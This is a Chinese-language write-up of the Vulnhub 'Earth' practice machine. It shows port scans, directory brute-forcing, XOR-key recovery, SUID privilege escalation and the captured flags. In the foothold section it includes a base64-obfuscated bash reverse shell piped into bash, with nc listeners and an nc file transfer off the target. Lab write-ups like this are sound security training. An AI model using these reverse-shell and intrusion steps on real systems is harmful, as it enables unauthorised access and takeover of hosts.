Vulnhub-Earth靶机笔记

Earth 靶机笔记

概述

这是一台 Vulnhub 的靶机，主要是

Earth 靶机地址：https://vulnhub.com/entry/the-planets-earth,755/#download

一、nmap 扫描

1、端口扫描

-sT 以 TCP 全连接扫描，--min-rate 10000 以最低 10000 速率进行扫描，-p-进行全端口扫描，-o ports 结果输出到 ports 文件中

sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.52.4

Nmap scan report for 192.168.52.4
Host is up (0.00042s latency).
Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 00:0C:29:5D:22:84 (VMware)# Nmap done at Fri Nov 22 15:32:16 2024 -- 1 IP address (1 host up) scanned in 13.43 seconds

2、详细信息扫描

以-sT 以 tcp， -sV 探测版本， -sC 以默认脚本 扫描端口 $ports，-O 探测操作系统版本，输出到 details 文件中

sudo nmap -sT -sV -sC -p22,80,443 -O -o nmapscan/details 192.168.52.4

结果：

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_  256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:5D:22:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 15:33:47 2024 -- 1 IP address (1 host up) scanned in 20.41 seconds

看到目标的两个域名信息 earth.local，terratest.earth.local 我们将他写到 /etc/hosts 文件中

3、默认脚本扫描

nmap --script=vuln -p22,80,443 -o nmapscan/vuln 192.168.52.4

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
443/tcp open  https
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:5D:22:84 (VMware)# Nmap done at Fri Nov 22 15:34:49 2024 -- 1 IP address (1 host up) scanned in 42.87 seconds

二、web 渗透

看到目标开放了 80 和 443 端口，我们打开看看

80 端口

443 端口

是一个 webserver 的默认页面

我们还有两个域名同时也看一下，发现两个域名所透露出来的信息是一样的

看样子是一个消息反馈的页面，而下面有 Previous Messages 也就是 曾经的消息 看样子是加密了，而解密出来很可能是我们感兴趣的内容。

走到这里我们可以进行目录爆破了，从而充分扩大我们的攻击面

sudo gobuster dir -u http://192.168.52.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

sudo gobuster dir -u https://192.168.52.4:443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

sudo gobuster dir -u https://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

sudo gobuster dir -u https://terratest.earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

同时还可以加参数 -x zip,tar,txt 等后缀，扩大字典再次进行第二次扫描

通过目录爆破我们发现了 https://earth.local 下面有一个 /admin 的页面

是一个登陆页面

我们所知道的信息也就这些，当然我们在后边尝试几个可能的路径，像是：/robots.txt 这类的目录

在 terratest.earth.local 域名下发现了一个 /testingnotes.*，尝试 fuzz 一下，发现是 /testingnotes.txt

发现了一段话

关键的信息有：

采用 XOR，也就是异或加密

testdata.txt 内容是加密的密钥

terra 是用户名

查看 testdata.txt 内容

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

我们来到 CyberChef 解密内容

解密成功 earthclimatechangebad4humans 的重复字符串

这个应该就是密码，尝试在 admin 页面登陆

登录成功看到是一个命令执行的框

三、获得立足点

构造反弹 shell payload

echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjMvNDQ0NCAwPiYxJwo= | base64 -d | bash

在网页执行这个

kali 端开启监听

sudo rlwrap -cAr nc -lvnp 4444

成功获得了初始的 shell

在 /var/earth_web 翻找到了 user 的 flag

四、提权到 root

find / -perm -4000 -type f 2> /dev/null

有一个 reset_root 文件，令我们很感兴趣，执行看看

看来执行失败了

利用 nc 传输到 kali 本地进行分析

kali 执行

nc -lvp 4444 > reset_root

靶机执行

cat /usr/bin/reset_root | nc 192.168.52.3 4444

看到传输完成

chmod +x reset_root

利用 file 查看文件属性

file reset_root

看到就是 linux 的可执行文件

利用 ltrace 看看它的函数调用

ltrace ./reset_root

看到有几个文件是不存在的

程序尝试访问 /dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5 和 /tmp/kcM0Wewe 这些文件，但访问失败（返回值为-1）

在靶机上创建这些文件

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

再次执行

reset_root

看到 root 密码已经被我们重置为了 Earth

成功获得了 root 权限

找到了 root_flag

来一张照吧

[root@earth ~]# whoami
whoami
root
[root@earth ~]# uname -a
uname -a
Linux earth 5.14.9-200.fc34.x86_64 #1 SMP Thu Sep 30 11:55:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
[root@earth ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000link/ether 00:0c:29:5d:22:84 brd ff:ff:ff:ff:ff:ffaltname enp2s1inet 192.168.52.4/24 brd 192.168.52.255 scope global dynamic noprefixroute ens33valid_lft 1730sec preferred_lft 1730secinet6 fe80::f2c5:57e:d7af:5f01/64 scope link noprefixroute valid_lft forever preferred_lft forever
[root@earth ~]# cat /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth ~]# cat root_flag.txt
cat root_flag.txt_-o#&&*''''?d:>b\__o/"`''  '',, dMF9MMMMMHo_.o&#'        `"MbHMMMMMMMMMMMHo..o"" '         vodM*$&&HMMMMMMMMMM?.,'              $M&ood,~'`(&##MMMMMMH\/               ,MMMMMMM#b?#bobMMMMHMMML&              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    ':|MMMMMM-                 `MMMMMMMT .M|.   :.9MMM[                    &MMMMM*' `'    .:9MMk                    `MMM#"        -&M}                     `          .-`&.                             .`~,   .                     ./. _                  .-'`--._,dd###pp=""'Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

这台靶机就被我们拿下了

最后

happy hacking ~~~